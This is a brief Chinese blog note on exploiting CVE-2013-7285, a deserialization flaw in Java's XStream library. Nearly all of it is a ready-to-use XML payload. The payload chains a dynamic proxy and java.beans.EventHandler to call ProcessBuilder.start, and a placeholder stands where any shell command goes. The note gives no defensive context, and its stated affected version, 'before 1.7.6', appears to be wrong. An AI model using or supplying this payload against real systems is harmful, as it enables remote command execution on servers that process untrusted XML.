【笔记】CVE-2013-7285漏洞利用

发表于 更新于 阅读次数:

前言

Java的com.thoughtworks.xstream.XStream包的1.7.6以前的版本出现的CVE-2013-7285的漏洞利用

payload

<<command>>:Shell命令

1
2
3
4
5
6
7
8
9
10
11
12
13
14
<sorted-set>
    <string>foo</string>
    <dynamic-proxy>
        <interface>java.lang.Comparable</interface>
        <handler class="java.beans.EventHandler">
            <target class="java.lang.ProcessBuilder">
                <command>
                    <string><<command>></string>
                </command>
            </target>
            <action>start</action>
        </handler>
    </dynamic-proxy>
</sorted-set>

完成

参考文献

哔哩哔哩——逆风微笑的代码狗